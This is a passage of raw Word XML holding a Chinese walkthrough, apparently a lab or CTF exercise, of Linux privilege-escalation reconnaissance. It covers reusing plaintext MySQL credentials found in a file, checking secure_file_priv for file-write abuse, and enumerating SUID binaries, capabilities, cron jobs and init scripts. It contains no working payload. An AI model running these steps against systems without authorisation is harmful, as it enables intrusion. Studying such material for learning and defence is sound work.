            <wp:docPr id="7315649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4954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D71" w14:textId="18F382D8" w:rsidR="00E0687B" w:rsidRPr="00F6730A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340AD0F7" w14:textId="2124401A" w:rsidR="000303FA" w:rsidRPr="001464F1" w:rsidRDefault="00F7049B" w:rsidP="001464F1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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Ref173159913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提升</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="426A8CA5" w14:textId="62E9E48A" w:rsidR="001464F1" w:rsidRDefault="00440B55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查看当前用户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权限，发现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</w:t>
      </w:r>
      <w:r w:rsidR="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidR="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码才能查看当前用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001464F1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 w:rsidR="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>权限情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DCB3C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7D07BFE1" wp14:editId="6ADEB9B4">
            <wp:extent cx="5274310" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9462219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21913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729" w14:textId="50856F0D" w:rsidR="001464F1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4D486D1B" w14:textId="10612C56" w:rsidR="001464F1" w:rsidRDefault="001464F1" w:rsidP="00440B55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r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cd ~</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进入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的家目录，输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ls -al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查看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目录的内容，发现存在一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录，进入后有一个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文件和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dpmAp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文件夹及一张图片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>troll.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cat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的内容，存在一个明文的数据库的用户名和密码对</w:t>
      </w:r>
      <w:r w:rsidRPr="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HeLL0alI4ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ss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unal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端口开放情况，发现确实开放数据库的本地监听端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3306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7B26D78D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ABB781D" wp14:editId="62845E37">
            <wp:extent cx="4743450" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20088935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3539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EA84" w14:textId="5F2B1E42" w:rsidR="001464F1" w:rsidRPr="001464F1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6B16FF32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9A3E5A2" wp14:editId="7EE5A389">
            <wp:extent cx="5274310" cy="1049655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="78016076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0761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F51" w14:textId="2B7C0D73" w:rsidR="001464F1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14:paraId="09E5C23E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7E414833" wp14:editId="5580806D">
            <wp:extent cx="5274310" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="7642246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4633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008" w14:textId="76ADDAB6" w:rsidR="001464F1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14:paraId="5F929E94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991C6E2" wp14:editId="235F5333">
            <wp:extent cx="5274310" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="34028912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89126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E7DB" w14:textId="50630F49" w:rsidR="001464F1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14:paraId="4AE4E36E" w14:textId="4ACB0627" w:rsidR="00062BD2" w:rsidRDefault="001464F1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尝试使用该用户名和密码登录数据库，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r admin -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，再输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HeLL0alI4ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>成功进入到数据库中。</w:t>
      </w:r>
      <w:r w:rsidR="000556C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入命令</w:t>
      </w:r>
      <w:r w:rsidR="000556C8" w:rsidRPr="000556C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>show global variables like '%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000556C8" w:rsidRPr="000556C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>secure_file_priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000556C8" w:rsidRPr="000556C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>%';</w:t>
      </w:r>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>空代表</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以以运行数据库用户的身份向任何该用户可写的位置写入文件，也就是说如果数据库是以</w:t>
      </w:r>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户运行的，那么可以通过数据库向系统内任</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E0FCC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="001E0FCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>位置写入文件。</w:t>
      </w:r>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>但仅仅以</w:t>
      </w:r>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份写入文件是不够的，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提权还</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要通过以</w:t>
      </w:r>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00062BD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份运行写入的文件才可行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293DBC19" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="001464F1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3BB69331" wp14:editId="2010669E">
            <wp:extent cx="5274310" cy="1654175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="14584801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80136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7272" w14:textId="15C42085" w:rsidR="001464F1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14:paraId="14DEE00D" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="001E0FCC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AA7B04A" wp14:editId="1AD41E82">
            <wp:extent cx="5274310" cy="1205865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="170459812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8123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6C7" w14:textId="6DDE4D27" w:rsidR="001464F1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14:paraId="10100A5F" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRDefault="00062BD2" w:rsidP="00062BD2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特殊权限文件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</w:p>
    <w:p w14:paraId="526A9057" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRDefault="00062BD2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F2634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF2634">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>find / -perm -u=s 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看被设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>位的文件，这些文件均无法用于提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D302B6D" w14:textId="2A0753A6" w:rsidR="00062BD2" w:rsidRDefault="00062BD2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sbin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getcap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 xml:space="preserve"> -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看特殊能力文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也没有可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于提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000045FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>能力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9AE7168" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00062BD2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7329441" wp14:editId="0C0CF43E">
            <wp:extent cx="5274310" cy="1847215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="14645032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0327" name="图片 1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ECC0" w14:textId="7F024BCA" w:rsidR="00062BD2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14:paraId="5401F60A" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00062BD2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76DDAC4" wp14:editId="48792B6A">
            <wp:extent cx="5274310" cy="424815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2133017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76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5F2" w14:textId="00F00CD5" w:rsidR="00062BD2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14:paraId="2F81568E" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRDefault="00062BD2" w:rsidP="00062BD2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定时启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE25DDB" w14:textId="658F5BAC" w:rsidR="00062BD2" w:rsidRDefault="00062BD2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crontab -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看当前用户定时任务，发现没有这个命令。</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ls -al</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看系统定时任务</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的内容和权限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5C3150">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>包括文件</w:t>
      </w:r>
      <w:r w:rsidR="005C3150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5C3150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5C3150">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/crontab</w:t>
      </w:r>
      <w:r w:rsidR="005C3150">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及目录</w:t>
      </w:r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cron.d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r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r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cron.hourly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r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r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cron.daily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r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r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cron.weekly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r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r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19387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cront.monthly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/</w:t>
      </w:r>
      <w:r w:rsidR="0019387A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发现这些脚本及其脚本中调用的文件均对用户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ichae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没有写权限。例如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ron.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下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定时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只有</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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用户可修改，</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>且定时执行的脚本</w:t>
      </w:r>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/lib/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0019387A" w:rsidRPr="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sessionclean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也只有</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="0019387A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户可以修改，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>因此定时启动项无法利用以提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53057" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="005C3150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50CE478" wp14:editId="6AA5BFD6">
            <wp:extent cx="3762375" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="427115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54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D0A8" w14:textId="359CADDD" w:rsidR="005C3150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</w:p>
    <w:p w14:paraId="4A8960F6" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="0019387A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BB41ED5" wp14:editId="413A057D">
            <wp:extent cx="5274310" cy="2223135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="8102025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2565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A0DF" w14:textId="6D370C3C" w:rsidR="005C3150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</w:p>
    <w:p w14:paraId="384F614A" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="0019387A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F829F57" wp14:editId="24A83573">
            <wp:extent cx="5274310" cy="2049780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="4321387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8711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C962" w14:textId="3421D922" w:rsidR="00062BD2" w:rsidRPr="00C22BFC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</w:p>
    <w:p w14:paraId="61165D10" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRDefault="00062BD2" w:rsidP="00062BD2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开机自启项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FD0BF3" w14:textId="77777777" w:rsidR="00062BD2" w:rsidRDefault="00062BD2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F0DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进入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it.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查看当前系统的所有开机自启项，发现这些开机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和定时启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一样，均对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无写权限。</w:t>
      </w:r>
    </w:p>
